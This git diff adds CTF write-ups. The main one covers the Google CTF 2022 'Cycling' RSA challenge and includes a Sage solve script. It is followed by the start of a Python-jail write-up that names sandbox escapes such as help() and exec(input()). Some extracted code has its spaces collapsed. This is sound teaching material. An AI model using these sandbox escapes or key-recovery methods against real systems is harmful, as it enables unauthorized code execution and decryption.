The inner $\lambda$ corresponds to the multiplicative order of the flag, $|m| \pmod n$
+
The outer $\lambda$ corresponds to the multiplicative order of $e$, modulo $|m|$
+
+
+
$p - 1$ and $q - 1$ are square-free, that is, none of their prime factors occur with multiplicity $> 1$.
+
All $s_i - 1$ are square-free, where $s_i \mid \lambda(n)$, but this has been confirmed by the factorization of $R + 1$
+
+
+
And let’s also introduce some counterexamples for all of these, where our assumption is invalidated, and our solution becomes broken:
+
+
+
We explore the possibility for both $\lambda$s:
+
+
Let $n = 77$, then $\lambda(n) = \mathrm{lcm}(6, 10) = 30$, but for the message $m = 15$, it’s already true that $m^5 \equiv 1 \pmod n$, rather than the expected $m^{30}$.
+This in turn implies that we only need $e^{R + 1} \equiv 1 \pmod 5$ to complete decrypt this message by cycling.
+
We now use $n = 989 = 23\times43$, so $\lambda(n) = 2\times3\times7\times11 = 462$ and $\lambda(\lambda(n)) = \mathrm{lcm}(2, 6, 10) = 30$, but for instance $e = 379$ only has multiplicative order $5$ modulo $\lambda(n)$.
+
+
+
Consider $n = 163\times67 = 10921$, then $\lambda(n) = \mathrm{lcm}(2\times3^4, 2\times3\times11) = 2\times3^4\times11 = 1782$.
+$\lambda(\lambda(n))$ would then be $2\times3^3\times5$, and we’d never pick up $3^4$ as a potential factor out of any subset.
+
Similar issues to the earlier point occur, except they are introduced slightly later in the process of computing $\lambda(\lambda(n))$.
+
+
+
Other than those assumptions, there’s some more things that can go wrong.
+We’ve relied on enumerating all subsets of factors of $R + 1$, but — as we remarked with an initial failed idea of repeating such an enumeration on the result of that — that takes exponential time in the number of factors.
+If we end up with a large amount of these factors, we might in fact already get in trouble trying to enumerate all subsets, and spend a long time waiting for that.9
+On the other side of that medallion, to obtain that initial list of factors, we need to be able to factor this value $R + 1$.
+Now, if we consider for instance the worst case, where $p$ and $q$ are what we could call doubly-safe primes, i.e. $p = 2(2p’ + 1) + 1$, $p$ and $\frac{p - 1}{2}$ are both safe primes, there’s only a minor difference in number of bits between $n$ and $\lambda(\lambda(n))$ and the latter is even a new RSA modulus.
+By assumed security of RSA (unless you get extra information like in this challenge), factoring that would not be feasible.
+
+
Can we fix it?
+
+
+
Yes we can!
+
+
+
Sort of, at least.
+Unless my very vague notion from the footnote in the previous section pans out, I don’t expect we could get around the exponential time enumeration, or the factoring problems.
+We can however try to fix up some of the problems our assumptions brought along, and get a slightly more generic solution.
+
+
Let’s first look at the case where $|m| < \lambda(n)$.
+Since for our original approach, we only care about $m$ itself, and not about factoring, we only need to find a multiple of $|m|$, which we still get from our powerset enumeration (under the assumption, for now, that we get $\lambda(|m|)$).
+This means we can still compute an effective decryption exponent that works for $m$ itself, and any element with an order dividing $| m|$.
+Moreover, we can still use this to fully factor $n$ too.
+Once we decrypt $m$, we know that $m^{k\mid m|} \equiv 1 \pmod n$, which means we can again apply our p - 1 approach with a factor base to find an exponent $M$ such that $m^M \equiv 1 \pmod p$.
+Note that we require the use of $m$ as basis here, rather than an arbitrary number $a$.
+The only condition under which this will still necessarily fail is when $|m|$ divides $\gcd(p - 1, q - 1)$, since then any exponent such that $m^M \equiv 1 \pmod p$ also satisfies $m^M \equiv 1 \pmod q$.10
+
+
Next, we investigate the case where $R + 1 \ne \lambda(|m|)$.
+Unfortunately, the solution here isn’t quite as clean.
+When the order of $e$ is too small, we simply lack the information to recover enough primes.
+When the order of $e$ is only slightly too small, we should be able to salvage it with only a constant cost to our computation time.
+Pick a fixed-size (multi)set of small primes $\mathcal{P}$, and let $\mathcal{C}’ = \mathcal{C} \cup \mathcal{P}$.
+This increases the computation time with a factor $2^{|\mathcal{P}|}$, but as long as the “lost” factor of $\lambda(|m|)$ is factorable over $\mathcal{P}$, our algorithm works again.
+Optionally, if we would like to deal with more complex situations, we could also construct more complex ways to add extra factors.
+For example, an approach comparable to the “two-stage” variant of the p - 1 algorithm is possible, where we take e.g. at most 4 “small” primes and 1 “medium” sized extra prime.
+
+
Finally, how can we deal with the annoyance of prime powers?
+To deal with prime power divisors of $\lambda(n)$, it’s possible to apply a strategy similar to the p - 1 factoring algorithm, where every prime factor is simply included multiple times.
+Since exponents larger than $2$ can be detected in the factorization of $R + 1$, we recommend including each factor twice, unless evidence to the contrary is present from the factorization of $R + 1$.11
+The more conservative approach would be to include each prime $s$ a number of times proportional to $\frac{\log(n)}{\log(s)}$, which comes at an obvious computational cost.
+For the prime power divisors of $\lambda(\lambda(n))$, we’ll need to do just a bit more work.
+If we see a prime power $s^r$ when factoring $R + 1$, it should be clear from how $\lambda$ works that we expect to also see the factors of $s - 1$ appear.
+In that case, it’s obvious that $s^{r + 1}$ should be in $\mathcal{C}$.
+When however $s^2 \mid s_i$, we only see $s$ and the factors of $s - 1$ appear when factoring $R + 1$.
+Hence, when we add a prime to $\mathcal{C}$ that still divides $R + 1$, we should add it with a higher multiplicity.
+
+
Talk is cheap, show me the code
+
+
We present here the code as we implemented it during the CTF.
+That is, making maximal assumptions such that it still gets the flag.
+The code for factorization based on Pollard’s p - 1 algorithm can be found in the official solution.
+Interested readers are encouraged to understand, implement and share the suggested improvements of this article :)
+
+
proof.all(False) # speed up primality checking a bit
+import itertools
+from Crypto.Util.number import long_to_bytes
+
+# From the itertools documentation/example
+def powerset(iterable):
+ "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
+ s = list(iterable)
+ return itertools.chain.from_iterable(itertools.combinations(s, r) for r in range(len(s)+1))
+
+# From factordb
+factors = [2, 3, 5, 17, 257, 641, 65537, 274177, 2424833, 6700417, 67280421310721, 1238926361552897, 59649589127497217, 5704689200685129054721, 7455602825647884208337395736200454918783366342657, (2^256+1)//1238926361552897, (2^512+1)//18078591766524236008555392315198157702078226558764001281]
+assert 2**1025-2 == prod(factors)
+
+C = []
+for ps in powerset(factors):
+ v = prod(ps) + 1
+ if is_prime(v):
+ C.append(prod(ps) + 1)
+Ξ = prod(C)
+
+e = 65537
+n = 0x99efa9177387907eb3f74dc09a4d7a93abf6ceb7ee102c689ecd0998975cede29f3ca951feb5adfb9282879cc666e22dcafc07d7f89d762b9ad5532042c79060cdb022703d790421a7f6a76a50cceb635ad1b5d78510adf8c6ff9645a1b179e965358e10fe3dd5f82744773360270b6fa62d972d196a810e152f1285e0b8b26f5d54991d0539a13e655d752bd71963f822affc7a03e946cea2c4ef65bf94706f20b79d672e64e8faac45172c4130bfeca9bef71ed8c0c9e2aa0a1d6d47239960f90ef25b337255bac9c452cb019a44115b0437726a9adef10a028f1e1263c97c14a1d7cd58a8994832e764ffbfcc05ec8ed3269bb0569278eea0550548b552b1
+ct = 0x339be515121dab503106cd190897382149e032a76a1ca0eec74f2c8c74560b00dffc0ad65ee4df4f47b2c9810d93e8579517692268c821c6724946438a9744a2a95510d529f0e0195a2660abd057d3f6a59df3a1c9a116f76d53900e2a715dfe5525228e832c02fd07b8dac0d488cca269e0dbb74047cf7a5e64a06a443f7d580ee28c5d41d5ede3604825eba31985e96575df2bcc2fefd0c77f2033c04008be9746a0935338434c16d5a68d1338eabdcf0170ac19a27ec832bf0a353934570abd48b1fe31bc9a4bb99428d1fbab726b284aec27522efb9527ddce1106ba6a480c65f9332c5b2a3c727a2cca6d6951b09c7c28ed0474fdc6a945076524877680
+
+d = pow(e, -1, Ξ)
+print(long_to_bytes(int(pow(ct, d, n))))
+
For simplicity, we restrict the choices of $p_i^{r_i}$ here to those values where $p_i \ne 2$ or $r_i < 3$, see e.g. the wikipedia page for the full details. ↩
+
+
+
Yet another minor assumption is introduced here, that none of the prime factors we deal with has a higher power than $1$. As we’ll be able to observe from the factorization of $R + 1$ later, this doesn’t seem too unlikely. ↩
+
+
+
[…] for the first time. We’ll also look at the intended solution after this, which takes a somewhat similar approach initially, but then applies it to factoring $n$ directly. ↩
+
+
+
In this script, we can also observe a clean explanation of why $R + 1$ can be easily factored or found on factordb: $R + 1 = 2(2^{1024} - 1)$ is twice a Mersenne number. ↩
+
+
+
Computing all of $M$ would result in a potentially huge number that is unwieldy to work with. ↩
+
+
+
Alternatively, we could reorder the factors in question, replace the notion of “largest” by “latest in the reordered sequence”, though that is less practical from an implementation point of view. ↩
+
+
+
After the end of the CTF, one of the organizers clarified that the challenge description would have better stated that the given number of repetitions works for any exponent $e$. reference. ↩
+
+
+
This does make me wonder if some other modification of e.g. the p - 1 algorithm might be able to deal with this issue, but so far I’ve been unable to come up with a proper adaptation. I’m always open for comments or ideas if you would happen to have any on this topic. ↩
+
+
+
Taken to the extreme, we might suddenly be able to factorize again, when e.g. $m^2 \equiv 1 \pmod n$. ↩
+
+
+
One exception here might be for powers of $2$, since that’s always the oddest prime, and it behaves differently when computing $\lambda$. ↩
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/GCTF-2022/crypto/cycling.md b/GCTF-2022/crypto/cycling.md
new file mode 100755
index 0000000..77da300
--- /dev/null
+++ b/GCTF-2022/crypto/cycling.md
@@ -0,0 +1,253 @@
+# Cycling
+
+**Author**: Robin_Jadoul
+
+**Tags**: RSA, factoring
+
+**Points**: 201 (50 solves)
+
+**Alternate URL**:
+
+**Description**:
+
+> It is well known that any RSA encryption can be undone by just encrypting the ciphertext over and over again.
+> If the RSA modulus has been chosen badly then the number of encryptions necessary to undo an encryption is small.
+> However, if the modulus is well chosen then a cycle attack can take much longer. This property can be used for a timed release of a message.
+> We have confirmed that it takes a whopping 2^1025-3 encryptions to decrypt the flag.
+> Pack out your quantum computer and perform 2^1025-3 encryptions to solve this challenge. Good luck doing this in 48h.
+
+
+## Exploring the challenge
+
+Let's have a brief look at the source code we're provided with:
+
+```python
+e = 65537
+n = ... # snip
+ct = ... # snip
+# Decryption via cycling:
+pt = ct
+for _ in range(2**1025 - 3):
+ pt = pow(pt, e, n)
+# Assert decryption worked:
+assert ct == pow(pt, e, n)
+
+# Print flag:
+print(pt.to_bytes((pt.bit_length() + 7)//8, 'big').decode())
+```
+
+In short, we're faced with an RSA encryption of the flag, and one additional "fact" that's supposed to help us in some way.
+The fact is that when we repeat the encrypting exponentiation $R = 2^{1025} - 3$ times, we achieve the same as decrypting the ciphertext.
+Working through the math, this tells us that $x^{e^{R}} \equiv x$ holds, at the very least when $x$ represents the flag.
+
+A well-known fact when dealing with RSA, and modular exponentiation in general, is that the order of the multiplicative group mod $n$ is equal to the number of integers $< n$ that are coprime to $n$.
+This quantity is known as Euler's totient $\varphi(n)$.
+
+Furthermore, from Euler's theorem (or Lagrange's theorem if we frame it in a group-theoretic way), we know that any number $x$ taken to the $\varphi(n)$th power (mod $n$), results in the identity $1$.
+This property is in fact vital for the correctness of RSA, as we rely on the fact that $x^{\varphi(n)} \equiv 1 \pmod n$ when we say that $x^{ed} \equiv \left(x^{\varphi(n)}\right)^k x \equiv x$.
+
+From all this known theory underlying the RSA cryptosystem, we can now finally make a first deduction: $e^{R + 1} \equiv 1 \pmod{\varphi(n)}$.
+
+## Background: Carmichael's $\lambda$
+
+Actually, that previous statement is what you would say with a basic understanding of the principles underlying RSA, but it's in fact not entirely correct.
+It could very well be the case that $x^\ell \equiv 1 \pmod n$ for $\ell < \varphi(n)$.
+Moreover, this will for the case for *every* $x$ when $n = pq$ is an RSA modulus.
+One thing that Lagrange's theorem will still give us, even when $\ell \ne \varphi(n)$, is that $\ell \mid \varphi(n)$.[^1]
+
+The *smallest* exponent such that $x^\ell \equiv 1 \pmod n$ for *all* $x$ is known as the Carmichael function $\lambda(n)$.
+We know that $\lambda(n) \mid \varphi(n)$, but we can even write down a nicer formula:[^2]
+
+$$
+\lambda(p_1^{r_1}p_2^{r_2}\ldots p_m^{r_m}) = \mathrm{lcm}(p_1^{r_1 - 1}(p_1 - 1), \ldots, p_m^{r_m - 1}(p_m - 1))
+$$
+
+which, when we apply this to our RSA modulus $n$, becomes
+
+$$
+\lambda(pq) = \mathrm{lcm}(p - 1, q - 1)
+$$
+
+Returning to our wrong statement from before, we now know that $e^{R + 1} \equiv 1 \pmod \ell$ where $\ell \mid \lambda(n)$, and furthermore, since $e$ doesn't look too suspicious, nor can a readable flag be influenced all *that* much, we can in fact hope that $e^{R + 1} \equiv 1 \pmod{\lambda(n)}$.
+
+[^1]: Read as: $\ell$ divides $\varphi(n)$
+[^2]: For simplicity, we restrict the choices of $p_i^{r_i}$ here to those values where $p_i \ne 2$ or $r_i < 3$, see e.g. the [wikipedia page](https://en.wikipedia.org/wiki/Carmichael_function) for the full details.
+
+## Factors of factors of factors; and some subtractions
+
+Now that we understand the nuances of the formula $x^\ell \equiv 1$ a bit better, we can think further towards solving this challenge.
+Remember what we wrote down earlier?
+
+$$
+e^{R + 1} \equiv 1 \pmod{\lambda(n)}
+$$
+
+This tells us something more, since we have exactly the form of statement that lead us to introducing $\lambda(n)$ in the first place.
+We could now say that $R + 1 \mid \lambda(\lambda(n))$, which gives us a somewhat nice relation between the value $R$ we'd been given, and our RSA modulus $n$.
+
+Let's not worry about the possibility that $R + 1$ is only a divisor, and instead assume that it holds with equality $R + 1 = \lambda(\lambda(n))$.
+Then we can try to write down what we expect $R + 1$ to be:[^3]
+
+$$
+\begin{aligned}
+R + 1 = \lambda(\lambda(n)) &= \lambda(\mathrm{lcm}(p - 1, q - 1)) \\
+ &= \lambda(2s_1s_2\ldots s_m) \\
+ &= \mathrm{lcm}(s_1 - 1, \ldots, s_m - 1)
+\end{aligned}
+$$
+
+We now would like to relate these values $s_i - 1$ to $R$ somehow.
+By the above, it should be clear that any $s_i - 1 \mid R + 1$, so when we list all divisors of $R + 1$ in turn, and add $1$ to them, we should end up with a set of candidates $\mathcal{C}$, such that $\\{s_i\\}_i \subseteq \mathcal{C}$.
+The value $R + 1$ itself is not particularly easy to factor in a short amount of time, but luckily it's not an esoteric, unknown value, but a nicely structured one.
+And as it often happens to nicely structured values, they show up on [factordb](http://factordb.com/index.php?query=2%5E1025+-+2).
+
+[^3]: Yet another minor assumption is introduced here, that none of the prime factors we deal with has a higher power than $1$. As we'll be able to observe from the factorization of $R + 1$ later, this doesn't seem too unlikely.
+
+
+## Who cares if it's not *the* private key? It works
+
+With the set $\mathcal{C}$, what could we do?
+One option to consider is applying the same trick again, but using $\mathcal{C}$ rather than the factorization of $R + 1$, to recover $p$ and $q$.
+Annoyingly, $\mathcal{C}$ is a rather large set, and enumerating all subsets of it takes exponential time, so we'll have to throw that idea out.
+
+Instead, let's look back at our initial, more naive, understanding of the RSA cryptosystem, where we used $\varphi(n)$ rather than $\lambda(n)$ to compute the decryption exponent $d = e^{-1} \pmod{\varphi(n)}$.
+Even though we didn't have the smallest modulus possible, we still had full correctness, since --- as we know by now --- $\lambda(n) \mid \varphi(n)$.
+We can take that to the extreme: we know/assume that all factors of $\lambda(n)$ are among our values $s_i$, so if we simply take $\Xi = \prod_i s_i$, it should hold that $\lambda(n) \mid \Xi$, and as such, we could use $\Xi$ as a "replacement" for $\lambda(n)$ or $\varphi(n)$ when it comes to computing a decryption exponent.
+
+With this, we have enough ideas and information to finally solve this challenge[^4].
+
+> `CTF{Recycling_Is_Great}`
+
+[^4]: [...] for the first time. We'll also look at the intended solution after this, which takes a somewhat similar approach initially, but then applies it to factoring $n$ directly.
+
+## All your factorbase are belong to us
+
+The official [intended solution](https://github.com/google/google-ctf/blob/master/2022/crypto-cycling/src/solve.py) relies on similar observations, but instead of finding some number $k\lambda(n)$, it uses those potential factors of $\lambda(n)$ to directly factor the modulus $n$.[^5]
+To understand how this factorization works, we look back at a well-known, simple special-purpose factoring algorithm: [Pollard's `p - 1` algorithm](https://en.wikipedia.org/wiki/Pollard%27s_p_%E2%88%92_1_algorithm).
+
+Pollard's algorithm allows finding a factor $p$ (say for $n = pq$) under the assumption that $p - 1$ is $B$-powersmooth.
+That is, all prime power divisors $s^r \mid p - 1$ are bounded by $s^r < B$.
+This property enables us to find some product $M$ of prime powers less than $B$, such that $p - 1 \mid M$ but $q - 1 \nmid M$.
+In turn, looking at Fermat's little theorem, we can see that for all $a$, it holds that $a^M \equiv 1 \pmod p$, but it will often be the case that $a^M \not\equiv 1 \pmod q$, and so looking for $\gcd(a^M - 1, n)$ should allow us to recover $p$.
+Traditionally, Pollard's method computes $a^M \pmod n$ by repeatedly taking $s$th powers of an accumulator and testing whether the $\gcd$ results in a factorization.
+The advantage of this is twofold: one doesn't need to fully compute $M$ in its entirety[^6] and as long as the largest factor of $p - 1$ differs from the largest factor of $q - 1$,[^7] the method will still work, rather than yielding $n$ as the $\gcd$.
+
+To abstract the bound $B$ away, we simply notice that all it gives us is some superset $\mathcal{C}$ of prime (power) factors of $p - 1$.
+This is exactly what we already found by enumerating primes $s_i$ such that $s_i - 1 \mid R + 1$!
+If we call such a set $\mathcal{C}$ a [factor base](https://en.wikipedia.org/wiki/Factor_base), and slightly generalize Pollard's algorithm, we can apply it to our situation as well.
+And this is exactly the approach we see in the official solution script: we take some base $a$ (there called $m$), repeatedly exponentiate it by potential prime factors, and check if $\gcd(a' - 1, n) \notin \{1, n\}$.
+
+Once a factorization of $n$ is found, it is of course only a matter of performing regular RSA decryption to obtain the flag.
+
+[^5]: In this script, we can also observe a clean explanation of why $R + 1$ can be easily factored or found on factordb: $R + 1 = 2(2^{1024} - 1)$ is twice a [Mersenne number](https://en.wikipedia.org/wiki/Mersenne_prime).
+[^6]: Computing all of $M$ would result in a potentially huge number that is unwieldy to work with.
+[^7]: Alternatively, we could reorder the factors in question, replace the notion of "largest" by "latest in the reordered sequence", though that is less practical from an implementation point of view.
+
+## Does this always work?
+
+Until now, we've made several assumptions that turned out to be correct, in order to solve this challenge.
+Even the official solution turns out to rely on those assumptions,[^8] so we'd like to have a look at how much trouble we'd be in when the assumptions would be invalidated.
+To restate our assumptions more explicitly:
+
+1. $R + 1 = \lambda(\lambda(n))$
+ - The inner $\lambda$ corresponds to the multiplicative order of the flag, $\|m\| \pmod n$
+ - The outer $\lambda$ corresponds to the multiplicative order of $e$, modulo $\|m\|$
+2. $p - 1$ and $q - 1$ are square-free, that is, none of their prime factors occur with multiplicity $> 1$.
+3. All $s_i - 1$ are square-free, where $s_i \mid \lambda(n)$, but this has been confirmed by the factorization of $R + 1$
+
+And let's also introduce some counterexamples for all of these, where our assumption is invalidated, and our solution becomes broken:
+
+1. We explore the possibility for both $\lambda$s:
+ - Let $n = 77$, then $\lambda(n) = \mathrm{lcm}(6, 10) = 30$, but for the message $m = 15$, it's already true that $m^5 \equiv 1 \pmod n$, rather than the expected $m^{30}$.
+ This in turn implies that we only need $e^{R + 1} \equiv 1 \pmod 5$ to complete decrypt this message by cycling.
+ - We now use $n = 989 = 23\times43$, so $\lambda(n) = 2\times3\times7\times11 = 462$ and $\lambda(\lambda(n)) = \mathrm{lcm}(2, 6, 10) = 30$, but for instance $e = 379$ only has multiplicative order $5$ modulo $\lambda(n)$.
+2. Consider $n = 163\times67 = 10921$, then $\lambda(n) = \mathrm{lcm}(2\times3^4, 2\times3\times11) = 2\times3^4\times11 = 1782$.
+ $\lambda(\lambda(n))$ would then be $2\times3^3\times5$, and we'd never pick up $3^4$ as a potential factor out of any subset.
+3. Similar issues to the earlier point occur, except they are introduced slightly later in the process of computing $\lambda(\lambda(n))$.
+
+Other than those assumptions, there's some more things that can go wrong.
+We've relied on enumerating all subsets of factors of $R + 1$, but --- as we remarked with an initial failed idea of repeating such an enumeration on the result of that --- that takes exponential time in the number of factors.
+If we end up with a large amount of these factors, we might in fact already get in trouble trying to enumerate all subsets, and spend a long time waiting for that.[^9]
+On the other side of that medallion, to obtain that initial list of factors, we need to be able to factor this value $R + 1$.
+Now, if we consider for instance the worst case, where $p$ and $q$ are what we could call *doubly-safe* primes, i.e. $p = 2(2p' + 1) + 1$, $p$ and $\frac{p - 1}{2}$ are both safe primes, there's only a minor difference in number of bits between $n$ and $\lambda(\lambda(n))$ and the latter is even a new RSA modulus.
+By assumed security of RSA (unless you get extra information like in this challenge), factoring that would not be feasible.
+
+
+[^8]: After the end of the CTF, one of the organizers clarified that the challenge description would have better stated that the given number of repetitions works for *any* exponent $e$. [reference](https://discord.com/channels/984515980766109716/984516677624541194/993499537580761119).
+[^9]: This does make me wonder if some other modification of e.g. the `p - 1` algorithm might be able to deal with this issue, but so far I've been unable to come up with a proper adaptation. I'm always open for comments or ideas if you would happen to have any on this topic.
+
+## Can we fix it?
+
+> Yes we can!
+
+Sort of, at least.
+Unless my very vague notion from the footnote in the previous section pans out, I don't expect we could get around the exponential time enumeration, or the factoring problems.
+We can however try to fix up some of the problems our assumptions brought along, and get a slightly more generic solution.
+
+Let's first look at the case where $\|m\| < \lambda(n)$.
+Since for our original approach, we only care about $m$ itself, and not about factoring, we only need to find a multiple of $\|m\|$, which we still get from our powerset enumeration (under the assumption, for now, that we get $\lambda(\|m\|)$).
+This means we can still compute an effective decryption exponent that works for $m$ itself, and any element with an order dividing $\| m\|$.
+Moreover, we can still use this to fully factor $n$ too.
+Once we decrypt $m$, we know that $m^{k\mid m\|} \equiv 1 \pmod n$, which means we can again apply our `p - 1` approach with a factor base to find an exponent $M$ such that $m^M \equiv 1 \pmod p$.
+Note that we require the use of $m$ as basis here, rather than an arbitrary number $a$.
+The only condition under which this will still necessarily fail is when $\|m\|$ divides $\gcd(p - 1, q - 1)$, since then any exponent such that $m^M \equiv 1 \pmod p$ also satisfies $m^M \equiv 1 \pmod q$.[^10]
+
+[^10]: Taken to the extreme, we might suddenly be able to factorize again, when e.g. $m^2 \equiv 1 \pmod n$.
+
+Next, we investigate the case where $R + 1 \ne \lambda(\|m\|)$.
+Unfortunately, the solution here isn't quite as clean.
+When the order of $e$ is too small, we simply lack the information to recover enough primes.
+When the order of $e$ is only slightly too small, we should be able to salvage it with only a constant cost to our computation time.
+Pick a fixed-size (multi)set of small primes $\mathcal{P}$, and let $\mathcal{C}' = \mathcal{C} \cup \mathcal{P}$.
+This increases the computation time with a factor $2^{\|\mathcal{P}\|}$, but as long as the "lost" factor of $\lambda(\|m\|)$ is factorable over $\mathcal{P}$, our algorithm works again.
+Optionally, if we would like to deal with more complex situations, we could also construct more complex ways to add extra factors.
+For example, an approach comparable to the "two-stage" variant of the `p - 1` algorithm is possible, where we take e.g. at most 4 "small" primes and 1 "medium" sized extra prime.
+
+Finally, how can we deal with the annoyance of prime powers?
+To deal with prime power divisors of $\lambda(n)$, it's possible to apply a strategy similar to the `p - 1` factoring algorithm, where every prime factor is simply included multiple times.
+Since exponents larger than $2$ can be detected in the factorization of $R + 1$, we recommend including each factor twice, unless evidence to the contrary is present from the factorization of $R + 1$.[^11]
+The more conservative approach would be to include each prime $s$ a number of times proportional to $\frac{\log(n)}{\log(s)}$, which comes at an obvious computational cost.
+For the prime power divisors of $\lambda(\lambda(n))$, we'll need to do just a bit more work.
+If we see a prime power $s^r$ when factoring $R + 1$, it should be clear from how $\lambda$ works that we expect to also see the factors of $s - 1$ appear.
+In that case, it's obvious that $s^{r + 1}$ should be in $\mathcal{C}$.
+When however $s^2 \mid s_i$, we only see $s$ and the factors of $s - 1$ appear when factoring $R + 1$.
+Hence, when we add a prime to $\mathcal{C}$ that still divides $R + 1$, we should add it with a higher multiplicity.
+
+[^11]: One exception here might be for powers of $2$, since that's always the oddest prime, and it behaves differently when computing $\lambda$.
+
+## Talk is cheap, show me the code
+
+We present here the code as we implemented it during the CTF.
+That is, making maximal assumptions such that it still gets the flag.
+The code for factorization based on Pollard's `p - 1` algorithm can be found in the [official solution](https://github.com/google/google-ctf/blob/master/2022/crypto-cycling/src/solve.py).
+Interested readers are encouraged to understand, implement and share the suggested improvements of this article :)
+
+```sage
+proof.all(False) # speed up primality checking a bit
+import itertools
+from Crypto.Util.number import long_to_bytes
+
+# From the itertools documentation/example
+def powerset(iterable):
+ "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
+ s = list(iterable)
+ return itertools.chain.from_iterable(itertools.combinations(s, r) for r in range(len(s)+1))
+
+# From factordb
+factors = [2, 3, 5, 17, 257, 641, 65537, 274177, 2424833, 6700417, 67280421310721, 1238926361552897, 59649589127497217, 5704689200685129054721, 7455602825647884208337395736200454918783366342657, (2^256+1)//1238926361552897, (2^512+1)//18078591766524236008555392315198157702078226558764001281]
+assert 2**1025-2 == prod(factors)
+
+C = []
+for ps in powerset(factors):
+ v = prod(ps) + 1
+ if is_prime(v):
+ C.append(prod(ps) + 1)
+Ξ = prod(C)
+
+e = 65537
+n = 0x99efa9177387907eb3f74dc09a4d7a93abf6ceb7ee102c689ecd0998975cede29f3ca951feb5adfb9282879cc666e22dcafc07d7f89d762b9ad5532042c79060cdb022703d790421a7f6a76a50cceb635ad1b5d78510adf8c6ff9645a1b179e965358e10fe3dd5f82744773360270b6fa62d972d196a810e152f1285e0b8b26f5d54991d0539a13e655d752bd71963f822affc7a03e946cea2c4ef65bf94706f20b79d672e64e8faac45172c4130bfeca9bef71ed8c0c9e2aa0a1d6d47239960f90ef25b337255bac9c452cb019a44115b0437726a9adef10a028f1e1263c97c14a1d7cd58a8994832e764ffbfcc05ec8ed3269bb0569278eea0550548b552b1
+ct = 0x339be515121dab503106cd190897382149e032a76a1ca0eec74f2c8c74560b00dffc0ad65ee4df4f47b2c9810d93e8579517692268c821c6724946438a9744a2a95510d529f0e0195a2660abd057d3f6a59df3a1c9a116f76d53900e2a715dfe5525228e832c02fd07b8dac0d488cca269e0dbb74047cf7a5e64a06a443f7d580ee28c5d41d5ede3604825eba31985e96575df2bcc2fefd0c77f2033c04008be9746a0935338434c16d5a68d1338eabdcf0170ac19a27ec832bf0a353934570abd48b1fe31bc9a4bb99428d1fbab726b284aec27522efb9527ddce1106ba6a480c65f9332c5b2a3c727a2cca6d6951b09c7c28ed0474fdc6a945076524877680
+
+d = pow(e, -1, Ξ)
+print(long_to_bytes(int(pow(ct, d, n))))
+```
diff --git a/GCTF-2022/index.html b/GCTF-2022/index.html
new file mode 100755
index 0000000..6357754
--- /dev/null
+++ b/GCTF-2022/index.html
@@ -0,0 +1,219 @@
+
+
+
+
+
+Google CTF 2022 | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
Python was one of the first programming languages I became acquainted with, and to this day remains one of – and probably even the – main language I go back to when I need to quickly write something, ranging from a proof of concept, to a hacky script that does some math when I’m too lazy, to the ever-recurring CTF solution scripts.1
+As such, ever since I started playing CTFs and encountering pyjail challenges, I’ve thoroughly enjoyed the concept of these jails, the act of playing Houdini, and even occasionally creating some pyjail challenges myself.
+For some examples of earlier pyjails I particularly enjoyed, you can for example refer to my writeups for this recent challenge on DiceCTF or the 0CTF/TCTF challenge that to the best of my knowledge was the first to introduce the audit hook system as a jailing mechanism2.
+
+
Through this fascination and repeated exposure to pyjail challenges, in combination with coincidentally opening up the challenge rather early on, I was able to snatch the first blood on it.
+In a move that surprised myself too, I was able to have a turnaround time only 2 minutes between first looking at the challenge file, and obtaining the flag.
+
+
I was able to find several of the approaches and techniques presented further on by myself/independently, but in order to present a wider overview of the used attack surfaces, I also referenced the publicly posted exploits in the CTF discord.
+Even for those approaches where I constructed my own viable payloads, I attempt to reference some messages posted in the #sandbox channel of the public discord after the conclusion of the CTF.
+
+
One interesting thing to notice for this challenge in particular, and presumably a reason for the high solve count, is that several of the pyjail escape methods listed on the hacktricks page apply directly to this challenge, so the situation is already well-documented.
+
+
The great snake, constricted
+
+
Let’s first have a look at what the challenge allows us to do, or rather what it doesn’t allow us to do:
+
+
#!/usr/bin/python3 -u
+#
+# Flag is in a file called "flag" in cwd.
+#
+# Quote from Dockerfile:
+# FROM ubuntu:22.04
+# RUN apt-get update && apt-get install -y python3
+#
+importast
+importsys
+importos
+
+defverify_secure(m):
+ forxinast.walk(m):
+ matchtype(x):
+ case(ast.Import|ast.ImportFrom|ast.Call):
+ print(f"ERROR: Banned statement {x}")
+ returnFalse
+ returnTrue
+
+abspath=os.path.abspath(__file__)
+dname=os.path.dirname(abspath)
+os.chdir(dname)
+
+print("-- Please enter code (last line must contain only --END)")
+source_code=""
+whileTrue:
+ line=sys.stdin.readline()
+ ifline.startswith("--END"):
+ break
+ source_code+=line
+
+tree=compile(source_code,"input.py",'exec',flags=ast.PyCF_ONLY_AST)
+ifverify_secure(tree):# Safe to execute!
+print("-- Executing safe code:")
+ compiled=compile(source_code,"input.py",'exec')
+ exec(compiled)
+
+
+
Summarized: there is an ast based blacklist in place that prevents us from either calling functions3 or importing modules through the import statement.
+As far as I’m aware, ast relies on the actual parser that the python interpreter itself uses, so we’re unlikely to encounter any parser differentials to abuse here.
+On the upside, and something that’s certainly not a guarantee in this kind of challenge, we do have full access to all python builtins.
+There are also no character-level blocks, so we could use parentheses in some context if we wanted; as long as they’re not used to call a function.
+
+
On the topic of import statements, it’s worth noting that, with the access to the python builtins that we have, being able to call functions is enough, since the __import__ function could do everything we need from it.
+
+
Our end goal for this challenge would be an (arbitrary) file read of the flag file, but of course we won’t say no to getting full code execution if it happens to fit our needs.
+
+
My very first solution is similar to the polygl0ts writeup for the noparensjail challenge from b01lers CTF 2021.
+Contrary to the intended solution presented by the people from b01lers, we can’t directly use import, so we need some other approach.
+Luckily, the polygl0ts approach works, but is a bit more convoluted than what we really need.
+
+
To see why exactly, and to see the beauty of this exploit, we first make a quick detour through two short python expressions that can give us full code execution without further restrictions4 (either still in python, or directly in a shell).
+Without a doubt, the shortest expression I know that achieves this is help(), which can spawn a shell through the more pager if a topic that takes up more than a page is requested at the interactive help prompt.
+Unfortunately, that requires both a pager being present, and a tty, which isn’t the case for this challenge.
+So instead, I went for the second convenient method I knew: exec(input()).
